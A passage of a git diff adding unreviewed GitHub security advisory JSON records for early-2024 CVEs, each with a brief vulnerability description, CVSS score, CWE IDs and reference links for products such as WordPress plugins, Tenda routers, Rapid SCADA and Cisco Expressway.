"https://nvd.nist.gov/vuln/detail/CVE-2024-23978" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/vu/JVNVU93740658/" + }, + { + "type": "WEB", + "url": "https://www.au.com/support/service/mobile/guide/wlan/home_spot_cube_2/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9pp3-66w8-j42c/GHSA-9pp3-66w8-j42c.json b/advisories/unreviewed/2024/02/GHSA-9pp3-66w8-j42c/GHSA-9pp3-66w8-j42c.json new file mode 100644 index 0000000000000..8f1c92712e6e1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9pp3-66w8-j42c/GHSA-9pp3-66w8-j42c.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9pp3-66w8-j42c", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2024-23746" + ], + "details": "Miro Desktop 0.8.18 on macOS allows Electron code injection.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23746" + }, + { + "type": "WEB", + "url": "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection" + }, + { + "type": "WEB", + "url": "https://github.com/louiselalanne/CVE-2024-23746" + }, + { + "type": "WEB", + "url": "https://miro.com/about/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9px9-grv9-rcf6/GHSA-9px9-grv9-rcf6.json b/advisories/unreviewed/2024/02/GHSA-9px9-grv9-rcf6/GHSA-9px9-grv9-rcf6.json new file mode 100644 index 0000000000000..ab7d8b4a0a605 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9px9-grv9-rcf6/GHSA-9px9-grv9-rcf6.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9px9-grv9-rcf6", + "modified": "2024-02-03T18:30:20Z", + "published": "2024-02-03T18:30:20Z", + "aliases": [ + "CVE-2024-1215" + ], + "details": "A vulnerability was found in SourceCodester CRUD without Page Reload 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file fetch_data.php. The manipulation of the argument username/city leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252782 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1215" + }, + { + "type": "WEB", + "url": "https://github.com/PrecursorYork/crud-without-refresh-reload-Reflected_XSS-POC/blob/main/README.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252782" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252782" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T16:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9rvg-5948-h2q2/GHSA-9rvg-5948-h2q2.json b/advisories/unreviewed/2024/02/GHSA-9rvg-5948-h2q2/GHSA-9rvg-5948-h2q2.json new file mode 100644 index 0000000000000..5cb756fcc4c4e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9rvg-5948-h2q2/GHSA-9rvg-5948-h2q2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9rvg-5948-h2q2", + "modified": "2024-02-06T12:30:31Z", + "published": "2024-02-06T12:30:31Z", + "aliases": [ + "CVE-2024-24937" + ], + "details": "In JetBrains TeamCity before 2023.11.2 stored XSS via agent distribution was possible", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24937" + }, + { + "type": "WEB", + "url": "https://www.jetbrains.com/privacy-security/issues-fixed/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T10:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9v8v-3rjq-7h4r/GHSA-9v8v-3rjq-7h4r.json b/advisories/unreviewed/2024/02/GHSA-9v8v-3rjq-7h4r/GHSA-9v8v-3rjq-7h4r.json new file mode 100644 index 0000000000000..2a9738d21c352 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9v8v-3rjq-7h4r/GHSA-9v8v-3rjq-7h4r.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9v8v-3rjq-7h4r", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T00:31:27Z", + "aliases": [ + "CVE-2024-21852" + ], + "details": "In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an attacker can supply a malicious configuration file by utilizing a Zip Slip vulnerability in the unpacking routine to achieve remote code execution.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21852" + }, + { + "type": "WEB", + "url": "https://rapidscada.org/contact/" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9w2r-p3qj-g3gm/GHSA-9w2r-p3qj-g3gm.json b/advisories/unreviewed/2024/02/GHSA-9w2r-p3qj-g3gm/GHSA-9w2r-p3qj-g3gm.json new file mode 100644 index 0000000000000..586f17d17de43 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9w2r-p3qj-g3gm/GHSA-9w2r-p3qj-g3gm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9w2r-p3qj-g3gm", + "modified": "2024-02-06T06:30:32Z", + "published": "2024-02-06T06:30:32Z", + "aliases": [ + "CVE-2023-43532" + ], + "details": "Memory corruption while reading ACPI config through the user mode app.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43532" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-763" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-9wxq-v2f6-8h7g/GHSA-9wxq-v2f6-8h7g.json b/advisories/unreviewed/2024/02/GHSA-9wxq-v2f6-8h7g/GHSA-9wxq-v2f6-8h7g.json new file mode 100644 index 0000000000000..1c0c4fdc833b7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-9wxq-v2f6-8h7g/GHSA-9wxq-v2f6-8h7g.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9wxq-v2f6-8h7g", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-02-05T21:30:31Z", + "aliases": [ + "CVE-2024-24543" + ], + "details": "Buffer Overflow vulnerability in the function setSchedWifi in Tenda AC9 v.3.0, firmware version v.15.03.06.42_multi allows a remote attacker to cause a denial of service or run arbitrary code via crafted overflow data.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24543" + }, + { + "type": "WEB", + "url": "https://github.com/TimeSeg/IOT_CVE/blob/main/tenda/AC9V3/0130/setSchedWifi.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T21:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-c3c7-9cj5-pr3c/GHSA-c3c7-9cj5-pr3c.json b/advisories/unreviewed/2024/02/GHSA-c3c7-9cj5-pr3c/GHSA-c3c7-9cj5-pr3c.json new file mode 100644 index 0000000000000..9827e9b7bd0c5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-c3c7-9cj5-pr3c/GHSA-c3c7-9cj5-pr3c.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c3c7-9cj5-pr3c", + "modified": "2024-02-07T18:30:26Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-51536" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CRM Perks CRM Perks Forms – WordPress Form Builder allows Stored XSS.This issue affects CRM Perks Forms – WordPress Form Builder: from n/a through 1.1.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51536" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/crm-perks-forms/wordpress-crm-perks-forms-plugin-1-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-c493-5mp7-c24q/GHSA-c493-5mp7-c24q.json b/advisories/unreviewed/2024/02/GHSA-c493-5mp7-c24q/GHSA-c493-5mp7-c24q.json new file mode 100644 index 0000000000000..fb5276b4c6330 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-c493-5mp7-c24q/GHSA-c493-5mp7-c24q.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c493-5mp7-c24q", + "modified": "2024-02-08T06:30:23Z", + "published": "2024-02-08T06:30:23Z", + "aliases": [ + "CVE-2024-24202" + ], + "details": "An arbitrary file upload vulnerability in /upgrade/control.php of ZenTao Community Edition v18.10, ZenTao Biz v8.10, and ZenTao Max v4.10 allows attackers to execute arbitrary code via uploading a crafted .txt file.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24202" + }, + { + "type": "WEB", + "url": "https://clammy-blizzard-8ef.notion.site/Zentao-PMS-Authorized-Remote-Code-Execution-Vulnerability-1077a870c92848e18fe0c139c4fc2176" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T05:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-c4c9-rwvw-5wrf/GHSA-c4c9-rwvw-5wrf.json b/advisories/unreviewed/2024/02/GHSA-c4c9-rwvw-5wrf/GHSA-c4c9-rwvw-5wrf.json new file mode 100644 index 0000000000000..b8411bf5b29e1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-c4c9-rwvw-5wrf/GHSA-c4c9-rwvw-5wrf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c4c9-rwvw-5wrf", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-22386" + ], + "details": "A race condition was found in the Linux kernel's drm/exynos device driver in exynos_drm_crtc_atomic_disable() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22386" + }, + { + "type": "WEB", + "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8147" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T08:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-c56q-fqmf-hg57/GHSA-c56q-fqmf-hg57.json b/advisories/unreviewed/2024/02/GHSA-c56q-fqmf-hg57/GHSA-c56q-fqmf-hg57.json new file mode 100644 index 0000000000000..f5bc7ff80254f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-c56q-fqmf-hg57/GHSA-c56q-fqmf-hg57.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c56q-fqmf-hg57", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-02-01T06:31:05Z", + "aliases": [ + "CVE-2023-7069" + ], + "details": "The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2023.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7069" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027702%40advanced-iframe&new=3027702%40advanced-iframe&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2e32c51d-2d96-4545-956f-64f65c54b33b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T04:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-c5g4-g3x7-x8rm/GHSA-c5g4-g3x7-x8rm.json b/advisories/unreviewed/2024/02/GHSA-c5g4-g3x7-x8rm/GHSA-c5g4-g3x7-x8rm.json new file mode 100644 index 0000000000000..bdc012d81a91a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-c5g4-g3x7-x8rm/GHSA-c5g4-g3x7-x8rm.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c5g4-g3x7-x8rm", + "modified": "2024-02-06T03:32:59Z", + "published": "2024-02-06T03:32:59Z", + "aliases": [ + "CVE-2023-47353" + ], + "details": "An issue in the com.oneed.dvr.service.DownloadFirmwareService component of IMOU GO v1.0.11 allows attackers to force the download of arbitrary files.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47353" + }, + { + "type": "WEB", + "url": "https://github.com/actuator/imou/blob/main/com.dahua.imou.go-V1.0.11.md" + }, + { + "type": "WEB", + "url": "https://play.google.com/store/apps/details?id=com.dahua.imou.go" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-c6f2-5665-5p8p/GHSA-c6f2-5665-5p8p.json b/advisories/unreviewed/2024/02/GHSA-c6f2-5665-5p8p/GHSA-c6f2-5665-5p8p.json new file mode 100644 index 0000000000000..274f6e20111ac --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-c6f2-5665-5p8p/GHSA-c6f2-5665-5p8p.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c6f2-5665-5p8p", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-22773" + ], + "details": "Intelbras Roteador ACtion RF 1200 1.2.2 esposes the Password in Cookie resulting in Login Bypass.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22773" + }, + { + "type": "WEB", + "url": "https://medium.com/%40wagneralves_87750/poc-cve-2024-22773-febf0d3a5433" + }, + { + "type": "WEB", + "url": "https://www.youtube.com/watch?v=-r0TWJq55DU&t=7s" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-c7rp-5prq-c624/GHSA-c7rp-5prq-c624.json b/advisories/unreviewed/2024/02/GHSA-c7rp-5prq-c624/GHSA-c7rp-5prq-c624.json new file mode 100644 index 0000000000000..af79d385f3e87 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-c7rp-5prq-c624/GHSA-c7rp-5prq-c624.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c7rp-5prq-c624", + "modified": "2024-02-02T18:30:30Z", + "published": "2024-02-02T18:30:30Z", + "aliases": [ + "CVE-2021-21575" + ], + "details": "\nDell BSAFE Micro Edition Suite, versions before 4.5.2, contain an Observable Timing Discrepancy Vulnerability.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21575" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000189462/dsa-2021-131-dell-bsafetm-micro-edition-suite-multiple-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-208" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-c866-8gpw-p3mv/GHSA-c866-8gpw-p3mv.json b/advisories/unreviewed/2024/02/GHSA-c866-8gpw-p3mv/GHSA-c866-8gpw-p3mv.json new file mode 100644 index 0000000000000..81e6fd8262961 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-c866-8gpw-p3mv/GHSA-c866-8gpw-p3mv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c866-8gpw-p3mv", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-1329" + ], + "details": "HashiCorp Nomad and Nomad Enterprise 1.5.13 up to 1.6.6, and 1.7.3 template renderer is vulnerable to arbitrary file write on the host as the Nomad client user through symlink attacks. Fixed in Nomad 1.7.4, 1.6.7, 1.5.14.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1329" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2024-03-nomad-vulnerable-to-arbitrary-write-through-symlink-attack" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-610" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T20:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-c8h3-85xm-jxp3/GHSA-c8h3-85xm-jxp3.json b/advisories/unreviewed/2024/02/GHSA-c8h3-85xm-jxp3/GHSA-c8h3-85xm-jxp3.json new file mode 100644 index 0000000000000..d3304c1833666 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-c8h3-85xm-jxp3/GHSA-c8h3-85xm-jxp3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c8h3-85xm-jxp3", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-02-05T21:30:31Z", + "aliases": [ + "CVE-2023-27318" + ], + "details": "StorageGRID (formerly StorageGRID Webscale) versions 11.6.0 through \n11.6.0.13 are susceptible to a Denial of Service (DoS) vulnerability. A \nsuccessful exploit could lead to a crash of the Local Distribution \nRouter (LDR) service.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27318" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/NTAP-20240202-0012/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-248" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T21:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-cc2v-m8qh-5gfq/GHSA-cc2v-m8qh-5gfq.json b/advisories/unreviewed/2024/02/GHSA-cc2v-m8qh-5gfq/GHSA-cc2v-m8qh-5gfq.json new file mode 100644 index 0000000000000..56a144c84ba74 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-cc2v-m8qh-5gfq/GHSA-cc2v-m8qh-5gfq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cc2v-m8qh-5gfq", + "modified": "2024-02-01T12:30:22Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2024-21750" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scribit Shortcodes Finder allows Reflected XSS.This issue affects Shortcodes Finder: from n/a through 1.5.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21750" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/shortcodes-finder/wordpress-shortcodes-finder-plugin-1-5-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T10:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-ccj9-9hx6-vgjf/GHSA-ccj9-9hx6-vgjf.json b/advisories/unreviewed/2024/02/GHSA-ccj9-9hx6-vgjf/GHSA-ccj9-9hx6-vgjf.json new file mode 100644 index 0000000000000..8485f3240ef6a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-ccj9-9hx6-vgjf/GHSA-ccj9-9hx6-vgjf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ccj9-9hx6-vgjf", + "modified": "2024-02-07T18:30:28Z", + "published": "2024-02-07T18:30:28Z", + "aliases": [ + "CVE-2024-20255" + ], + "details": "A vulnerability in the SOAP API of Cisco Expressway Series and Cisco TelePresence Video Communication Server could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system.\n\n This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected system. An attacker could exploit this vulnerability by persuading a user of the REST API to follow a crafted link. A successful exploit could allow the attacker to cause the affected system to reload.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20255" + }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-csrf-KnnZDMj3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-ccx2-385m-5g4m/GHSA-ccx2-385m-5g4m.json b/advisories/unreviewed/2024/02/GHSA-ccx2-385m-5g4m/GHSA-ccx2-385m-5g4m.json new file mode 100644 index 0000000000000..1049a8293bb81 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-ccx2-385m-5g4m/GHSA-ccx2-385m-5g4m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ccx2-385m-5g4m", + "modified": "2024-02-07T03:30:33Z", + "published": "2024-02-07T03:30:33Z", + "aliases": [ + "CVE-2024-22022" + ], + "details": "Vulnerability CVE-2024-22022 allows a Veeam Recovery Orchestrator user that has been assigned a low-privileged role to access the NTLM hash of the service account used by the Veeam Orchestrator Server Service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22022" + }, + { + "type": "WEB", + "url": "https://veeam.com/kb4541" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-cf6q-mwq5-j3p8/GHSA-cf6q-mwq5-j3p8.json b/advisories/unreviewed/2024/02/GHSA-cf6q-mwq5-j3p8/GHSA-cf6q-mwq5-j3p8.json new file mode 100644 index 0000000000000..d6480ec93ae2e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-cf6q-mwq5-j3p8/GHSA-cf6q-mwq5-j3p8.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cf6q-mwq5-j3p8", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0709" + ], + "details": "The Cryptocurrency Widgets – Price Ticker & Coins List plugin for WordPress is vulnerable to SQL Injection via the 'coinslist' parameter in versions 2.0 to 2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0709" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/cryptocurrency-price-ticker-widget/trunk/includes/ccpw-db-helper.php?rev=3003658#L172" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024040%40cryptocurrency-price-ticker-widget&new=3024040%40cryptocurrency-price-ticker-widget&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b0603621-4521-4eb0-b4dd-e2257c133cee?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-cf78-r42v-cqjp/GHSA-cf78-r42v-cqjp.json b/advisories/unreviewed/2024/02/GHSA-cf78-r42v-cqjp/GHSA-cf78-r42v-cqjp.json new file mode 100644 index 0000000000000..77a6c0759a837 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-cf78-r42v-cqjp/GHSA-cf78-r42v-cqjp.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cf78-r42v-cqjp", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-1121" + ], + "details": "The Advanced Forms for ACF plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_json_file() function in all versions up to, and including, 1.9.3.2. This makes it possible for unauthenticated attackers to export form settings.", + "severity": [ + { + "type": "CVSS_V3", + "score": 